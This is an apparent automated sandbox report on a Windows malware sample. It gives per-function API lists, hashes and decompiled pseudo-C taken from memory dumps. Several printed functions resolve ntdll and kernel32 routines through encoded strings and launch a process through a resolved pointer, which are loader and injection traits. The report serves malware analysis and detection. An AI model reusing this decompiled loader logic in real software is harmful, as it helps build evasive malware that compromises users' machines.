API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
String ID:
API String ID: 1442030790-0
Opcode ID: e264079df7f6ed4f39c8a832f8223896d144bd09db55343191fae993f0889245
Instruction ID: 8b06022ef0df786b08cca816cdef8a1e6953294491a6714439d11324f78f2f32
Opcode Fuzzy Hash: e264079df7f6ed4f39c8a832f8223896d144bd09db55343191fae993f0889245
Instruction Fuzzy Hash: AC2107B5104205EEE7619BE5DC04E8B77EDEF82BA4F214839E464553A4FB2194E0FF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E14AD06, Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL ref: 6E14AD0E
_free.LIBCMT ref: 6E14AD27

Part of subcall function 6E14AB1D: HeapFree.KERNEL32(00000000,00000000,?,6E14DD47,00000000,00000001,00000000,?,?,?,6E14A62D,6E148593), ref: 6E14AB31
Part of subcall function 6E14AB1D: GetLastError.KERNEL32(00000000,?,6E14DD47,00000000,00000001,00000000,?,?,?,6E14A62D,6E148593), ref: 6E14AB43

_free.LIBCMT ref: 6E14AD3A
_free.LIBCMT ref: 6E14AD58
_free.LIBCMT ref: 6E14AD6A
_free.LIBCMT ref: 6E14AD7B
_free.LIBCMT ref: 6E14AD86
_free.LIBCMT ref: 6E14ADAA
RtlEncodePointer.NTDLL(6E28E390), ref: 6E14ADB1
_free.LIBCMT ref: 6E14ADC6
_free.LIBCMT ref: 6E14ADDC
_free.LIBCMT ref: 6E14AE04

Memory Dump Source

Source File: 00000003.00000002.597621733.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: f19f2e799b37aea24c0e0eecfae58976737c2d64c06ae237d8dced8df92403e6
Instruction ID: 9b307a10032e932dc7c993eccd15528fd8c227b66317d732f657ab1525b9dd44
Opcode Fuzzy Hash: f19f2e799b37aea24c0e0eecfae58976737c2d64c06ae237d8dced8df92403e6
Instruction Fuzzy Hash: 31218632901A25DBEF50AF94D884D5A3B6ABB277A1322053DE86557340E7346CC4FFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E15DDB3, Relevance: 16.6, APIs: 11, Instructions: 131COMMON

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 6E15DDEC
__calloc_crt.LIBCMT ref: 6E15DE3D
__lock.LIBCMT ref: 6E15DE53
__copytlocinfo_nolock.LIBCMT ref: 6E15DE64
_wcscmp.LIBCMT ref: 6E15DE9E
__lock.LIBCMT ref: 6E15DEB5
__updatetlocinfoEx_nolock.LIBCMT ref: 6E15DEC7
___removelocaleref.LIBCMT ref: 6E15DECD
__updatetlocinfoEx_nolock.LIBCMT ref: 6E15DEEC

Memory Dump Source

Source File: 00000003.00000002.597621733.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
String ID:
API String ID: 3432600739-0
Opcode ID: 386f87e99037bede0737ff33c2db1bb2f75131dd0416e254721e8572df207209
Instruction ID: 743ed73ee66a9faa3710370870e8599c4c7caf03de6da0d3b46a6f2b9679c5fe
Opcode Fuzzy Hash: 386f87e99037bede0737ff33c2db1bb2f75131dd0416e254721e8572df207209
Instruction Fuzzy Hash: 9F41B3B2504309EFDB01DFE4D844BCE77F8AB05718F20482AE92856384CB7596E6BF61

Uniqueness

Uniqueness Score: -1.00%

Function 01005CB0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E01005CB0(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E01008C20(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E0100A899( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x100d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x100d2a4; // 0x460a5a8
					_t18 = _t47 + 0x100e3e6; // 0x73797325
					_t68 = E010093FD(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x100d2a4; // 0x460a5a8
						_t19 = _t50 + 0x100e747; // 0x5618cef
						_t20 = _t50 + 0x100e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E010091D9();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E010091D9();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x100d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E01005DE8(_t70);
				goto L12;
			}

0x01005cb8
0x01005cb8
0x01005cc7
0x01005cce
0x01005cd3
0x01005de0
0x01005de7
0x01005de7
0x01005ce2
0x01005cea
0x01005ced
0x01005cf2
0x01005d07
0x01005d0d
0x01005d0e
0x01005d11
0x01005d17
0x01005d1a
0x01005d1f
0x01005d27
0x01005d33
0x01005d37
0x01005dc7
0x01005d3d
0x01005d3d
0x01005d42
0x01005d49
0x01005d5d
0x01005d61
0x01005db0
0x01005d63
0x01005d64
0x01005d6b
0x01005d84
0x01005d86
0x01005d8a
0x01005d91
0x01005dab
0x01005d93
0x01005d9c
0x01005da1
0x01005da1
0x01005d91
0x01005dbf
0x01005dbf
0x01005d37
0x01005dce
0x01005dd7
0x01005ddb
0x00000000

APIs

Part of subcall function 01008C20: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01005CCC,?,00000001,?,?,00000000,00000000), ref: 01008C45
Part of subcall function 01008C20: GetProcAddress.KERNEL32(00000000,7243775A), ref: 01008C67
Part of subcall function 01008C20: GetProcAddress.KERNEL32(00000000,614D775A), ref: 01008C7D
Part of subcall function 01008C20: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01008C93
Part of subcall function 01008C20: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01008CA9
Part of subcall function 01008C20: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 01008CBF

memset.NTDLL ref: 01005D1A

Part of subcall function 010093FD: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,0100197C,63699BCE,010089EF,73797325), ref: 0100940E
Part of subcall function 010093FD: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 01009428

GetModuleHandleA.KERNEL32(4E52454B,05618CEF,73797325), ref: 01005D50
GetProcAddress.KERNEL32(00000000), ref: 01005D57
HeapFree.KERNEL32(00000000,00000000), ref: 01005DBF

Part of subcall function 010091D9: GetProcAddress.KERNEL32(36776F57,01005762), ref: 010091F4

CloseHandle.KERNEL32(00000000,00000001), ref: 01005D9C
CloseHandle.KERNEL32(?), ref: 01005DA1
GetLastError.KERNEL32(00000001), ref: 01005DA5

Strings

@MxtNxt, xrefs: 01005DA5
Uxt, xrefs: 01005DBF

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID: Uxt$@MxtNxt
API String ID: 3075724336-2342693527
Opcode ID: 81e7ad199b159f7cec5bf88d66093aad64541981f2f575dcbef86e7ec0aa9a0a
Instruction ID: 06bf087a178bef7492fd693b0c4663683b397f409d28da41afa4d958b83b525f
Opcode Fuzzy Hash: 81e7ad199b159f7cec5bf88d66093aad64541981f2f575dcbef86e7ec0aa9a0a
Instruction Fuzzy Hash: 8C313FB1900209AFEB22AFE4DD88DDEBBBCEF04304F004566F685A7191D7359A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1485D7, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6E1485EA

Part of subcall function 6E14A60F: std::exception::_Copy_str.LIBCMT ref: 6E14A628

__CxxThrowException@8.LIBCMT ref: 6E1485FF

Part of subcall function 6E1495D4: RaiseException.KERNEL32(?,?,6E17D110,6E17B25C,?,?,?,?,?,6E148556,6E17D110,6E17B25C,?,00000001), ref: 6E149629

std::exception::exception.LIBCMT ref: 6E148618
__CxxThrowException@8.LIBCMT ref: 6E14862D
std::regex_error::regex_error.LIBCPMT ref: 6E14863F

Part of subcall function 6E1483AB: std::exception::exception.LIBCMT ref: 6E1483C5

__CxxThrowException@8.LIBCMT ref: 6E14864D
std::exception::exception.LIBCMT ref: 6E148666
__CxxThrowException@8.LIBCMT ref: 6E14867B

Strings

bad function call, xrefs: 6E148681

Memory Dump Source

Source File: 00000003.00000002.597621733.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: 147a73bc3666f78423f9af009256a92835bee4188d6dee32e9cd6069130a21c7
Instruction ID: 41f54e0b82232357f280130ca390509c0a52545db499b76fdac413af93f19446
Opcode Fuzzy Hash: 147a73bc3666f78423f9af009256a92835bee4188d6dee32e9cd6069130a21c7
Instruction Fuzzy Hash: 9F11BF74C0420DFBCF00EFE4C459CDDBB7CAB04544B508966AD156B244EB34E6C99B95

Uniqueness

Uniqueness Score: -1.00%

Function 01004B3D, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E01004B3D(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x100d33c; // 0x5619bc8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E01001BF8(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x100c1ac;
				}
				_t46 = E01005BBE(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E010098E4(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x100d2a4; // 0x460a5a8
						_t16 = _t75 + 0x100eb28; // 0x530025
						 *0x100d11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E01001BF8(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x100c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E010098E4(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E01005DE8(_v20);
						} else {
							_t66 =  *0x100d2a4; // 0x460a5a8
							_t31 = _t66 + 0x100ec48; // 0x73006d
							 *0x100d11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E01005DE8(_v12);
				}
				return _v24;
			}

0x01004b45
0x01004b4b
0x01004b52
0x01004b58
0x01004b5c
0x01004b60
0x01004b63
0x01004b68
0x01004b6d
0x01004b6f
0x01004b6f
0x01004b78
0x01004b7d
0x01004b82
0x01004b88
0x01004b92
0x01004b9b
0x01004ba2
0x01004bbb
0x01004bc0
0x01004bc5
0x01004bce
0x01004bd7
0x01004be8
0x01004bf1
0x01004bf5
0x01004bf9
0x01004bfe
0x01004c03
0x01004c05
0x01004c05
0x01004c0f
0x01004c18
0x01004c1f
0x01004c37
0x01004c3b
0x01004c78
0x01004c3d
0x01004c40
0x01004c48
0x01004c59
0x01004c65
0x01004c6d
0x01004c71
0x01004c71
0x01004c3b
0x01004c80
0x01004c85
0x01004c8c

APIs

GetTickCount.KERNEL32 ref: 01004B52
lstrlen.KERNEL32(?,80000002,00000005), ref: 01004B92
lstrlen.KERNEL32(00000000), ref: 01004B9B
lstrlen.KERNEL32(00000000), ref: 01004BA2
lstrlenW.KERNEL32(80000002), ref: 01004BAF
lstrlen.KERNEL32(?,00000004), ref: 01004C0F
lstrlen.KERNEL32(?), ref: 01004C18
lstrlen.KERNEL32(?), ref: 01004C1F
lstrlenW.KERNEL32(?), ref: 01004C26

Part of subcall function 01005DE8: HeapFree.KERNEL32(00000000,00000000,0100682B,00000000,?,?,00000000), ref: 01005DF4

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: f29cffc738805c8fb56ad9c7ec8e8f8a7c978966a1bd9c11030567545703e67e
Instruction ID: 9d086d04995340748b301ae75700c21b522689f44166d9e9ea110ee2037c06b6
Opcode Fuzzy Hash: f29cffc738805c8fb56ad9c7ec8e8f8a7c978966a1bd9c11030567545703e67e
Instruction Fuzzy Hash: 93416C7280010AFBEF22AFA4CD08DDEBBB5EF44314F054091EA44A7251DB36DA11EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 010061B9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E010061B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x100d2a4; // 0x460a5a8
				_t1 = _t9 + 0x100e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E01005B16(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E010098E4(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E01004D6A(_t34, _t41, _a8);
						E01005DE8(_t41);
						_t42 = E0100A543(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E01005DE8(_t36);
							_t36 = _t42;
						}
						_t43 = E01008D06(_t36, _t33);
						if(_t43 != 0) {
							E01005DE8(_t36);
							_t36 = _t43;
						}
					}
					E01005DE8(_t28);
				}
				return _t36;
			}

0x010061b9
0x010061bc
0x010061bd
0x010061c5
0x010061cc
0x010061d3
0x010061d7
0x010061dd
0x010061e4
0x010061e9
0x010061fb
0x010061ff
0x01006203
0x01006209
0x0100620e
0x0100621e
0x01006220
0x01006237
0x0100623b
0x0100623e
0x01006243
0x01006243
0x0100624c
0x01006250
0x01006253
0x01006258
0x01006258
0x01006250
0x0100625b
0x0100625b
0x01006266

APIs

Part of subcall function 01005B16: lstrlen.KERNEL32(00000000,00000000,00000000,770CC740,?,?,?,010061D3,253D7325,00000000,00000000,770CC740,?,?,01006028,?), ref: 01005B7D
Part of subcall function 01005B16: sprintf.NTDLL ref: 01005B9E

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,01006028,?,056195B0), ref: 010061E4
lstrlen.KERNEL32(?,?,?,01006028,?,056195B0), ref: 010061EC

Part of subcall function 010098E4: RtlAllocateHeap.NTDLL(00000000,00000000,01006788), ref: 010098F0

strcpy.NTDLL ref: 01006203
lstrcat.KERNEL32(00000000,?), ref: 0100620E

Part of subcall function 01004D6A: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,0100621D,00000000,?,?,?,01006028,?,056195B0), ref: 01004D81

Part of subcall function 01005DE8: HeapFree.KERNEL32(00000000,00000000,0100682B,00000000,?,?,00000000), ref: 01005DF4

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,01006028,?,056195B0), ref: 0100622B

Part of subcall function 0100A543: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,01006237,00000000,?,?,01006028,?,056195B0), ref: 0100A54D
Part of subcall function 0100A543: _snprintf.NTDLL ref: 0100A5AB

Strings

=, xrefs: 01006225

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: b474c55345f87656efdd68fef106cb22903c027ed3675744565fae260a4327d2
Instruction ID: 7bf500516953d2930de51dd829d653b14941eb0c9c41057d99ebd3a1477f23c3
Opcode Fuzzy Hash: b474c55345f87656efdd68fef106cb22903c027ed3675744565fae260a4327d2
Instruction Fuzzy Hash: A9110A3390151677B7237BB89C44CEF3B9D9EA9661F050156F685AB180DE35C90297A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E14DE09, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 6E14DE09

Part of subcall function 6E14AF51: RtlEncodePointer.NTDLL(00000000), ref: 6E14AF54
Part of subcall function 6E14AF51: __initp_misc_winsig.LIBCMT ref: 6E14AF6F
Part of subcall function 6E14AF51: GetModuleHandleW.KERNEL32(6E175EE8), ref: 6E150D88

__mtinitlocks.LIBCMT ref: 6E14DE0E
__mtterm.LIBCMT ref: 6E14DE17

Part of subcall function 6E14DE7F: RtlDeleteCriticalSection.NTDLL ref: 6E151CA5
Part of subcall function 6E14DE7F: _free.LIBCMT ref: 6E151CAC
Part of subcall function 6E14DE7F: RtlDeleteCriticalSection.NTDLL(6E17D520), ref: 6E151CCE

__calloc_crt.LIBCMT ref: 6E14DE3C
__initptd.LIBCMT ref: 6E14DE5E
GetCurrentThreadId.KERNEL32 ref: 6E14DE65

Memory Dump Source

Source File: 00000003.00000002.597621733.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 1551663144-0
Opcode ID: f4e4ca92c92e0a4c87c45ffd0e58f870966cde21f19ed882dbfedfb08763245d
Instruction ID: d47f59982dc4b1f037d969074d95155837fe6e0e02945482cb357137d29a7f57
Opcode Fuzzy Hash: f4e4ca92c92e0a4c87c45ffd0e58f870966cde21f19ed882dbfedfb08763245d
Instruction Fuzzy Hash: 19F0F672509A22DDEFA4BAF07C047CF36989B22A7CB214E2AE474E53D4FF1085C17955

Uniqueness

Uniqueness Score: -1.00%

Function 010012ED, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010012ED(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x100d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x100d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x100d258 = _t6;
					 *0x100d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x100d254 = _t7;
					if(_t7 == 0) {
						 *0x100d254 =  *0x100d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x010012f5
0x010012fb
0x01001302
0x00000000
0x0100135c
0x01001304
0x0100130c
0x01001319
0x01001319
0x01001359
0x00000000
0x01001359
0x0100131b
0x0100131b
0x01001320
0x01001332
0x01001337
0x0100133d
0x01001343
0x0100134a
0x0100134c
0x0100134c
0x00000000
0x01001353
0x01001315
0x00000000
0x00000000
0x01001317
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0100A21D,?,?,00000001,?,?,?,01005C19,?), ref: 010012F5
GetVersion.KERNEL32(?,00000001,?,?,?,01005C19,?), ref: 01001304
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,01005C19,?), ref: 01001320
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,01005C19,?), ref: 0100133D
GetLastError.KERNEL32(?,00000001,?,?,?,01005C19,?), ref: 0100135C

Strings

@MxtNxt, xrefs: 0100135C

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID: @MxtNxt
API String ID: 2270775618-1701360479
Opcode ID: 69133c5303836ae81211139700734aba5adc032bfa4165f065107228e8884f17
Instruction ID: e2367694190705c99ce294a1d5d44f98705cfb6a63f6ef288eb0a7267101cad9
Opcode Fuzzy Hash: 69133c5303836ae81211139700734aba5adc032bfa4165f065107228e8884f17
Instruction Fuzzy Hash: D8F0CD70640B02EBF773DBA8A919B193BA5A741B65F10C25AF6C2C61CCD77AC441CB25

Uniqueness

Uniqueness Score: -1.00%

Function 0100975F, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 010097B9
SysAllocString.OLEAUT32(0070006F), ref: 010097CD
SysAllocString.OLEAUT32(00000000), ref: 010097DF
SysFreeString.OLEAUT32(00000000), ref: 01009847
SysFreeString.OLEAUT32(00000000), ref: 01009856
SysFreeString.OLEAUT32(00000000), ref: 01009861

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 8a47fdb0d523117b08d929bd819fdc15cc8513ca4b74ec052ceb2d85f429aa6b
Instruction ID: 69a9b00384da03c0b0264aecc9a6844496e660e291699c0c4fc47e17378d9fcd
Opcode Fuzzy Hash: 8a47fdb0d523117b08d929bd819fdc15cc8513ca4b74ec052ceb2d85f429aa6b
Instruction Fuzzy Hash: 89417331D00609ABEB12DFFCD844ADFBBB9AF49304F104465EA54EB251DA71DE05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1535FB, Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 6E153636
__invoke_watson.LIBCMT ref: 6E153690
_strlen.LIBCMT ref: 6E153644

Part of subcall function 6E14B752: __getptd_noexit.LIBCMT ref: 6E14B752

_strnlen.LIBCMT ref: 6E1536CF
__lock.LIBCMT ref: 6E1536E0
__getenv_helper_nolock.LIBCMT ref: 6E1536EB

Memory Dump Source

Source File: 00000003.00000002.597621733.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 0c922dfd764d68d38f26e713a40b24cdf896a82691ba27ab660b519a31fb54dc
Instruction ID: 47f646d8fed5a80aa8f5928184f2a4df6a38d1fe3f365aacf3747a733a330cbf
Opcode Fuzzy Hash: 0c922dfd764d68d38f26e713a40b24cdf896a82691ba27ab660b519a31fb54dc
Instruction Fuzzy Hash: FA3120F1A046169ADB119BF49C08BDE679C9F05754F21042AD934DF388DB74CAE27790

Uniqueness

Uniqueness Score: -1.00%

Function 01008C20, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01008C20(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E010098E4(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x100d2a4; // 0x460a5a8
					_t1 = _t23 + 0x100e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x100d2a4; // 0x460a5a8
					_t2 = _t26 + 0x100e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E01005DE8(_t54);
					} else {
						_t30 =  *0x100d2a4; // 0x460a5a8
						_t5 = _t30 + 0x100e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x100d2a4; // 0x460a5a8
							_t7 = _t33 + 0x100e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x100d2a4; // 0x460a5a8
								_t9 = _t36 + 0x100e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x100d2a4; // 0x460a5a8
									_t11 = _t39 + 0x100e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E0100241F(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x01008c2f
0x01008c33
0x01008cf5
0x01008c39
0x01008c39
0x01008c3e
0x01008c51
0x01008c53
0x01008c58
0x01008c60
0x01008c67
0x01008c69
0x01008c6e
0x01008ced
0x01008cee
0x01008c70
0x01008c70
0x01008c75
0x01008c7d
0x01008c7f
0x01008c84
0x00000000
0x01008c86
0x01008c86
0x01008c8b
0x01008c93
0x01008c95
0x01008c9a
0x00000000
0x01008c9c
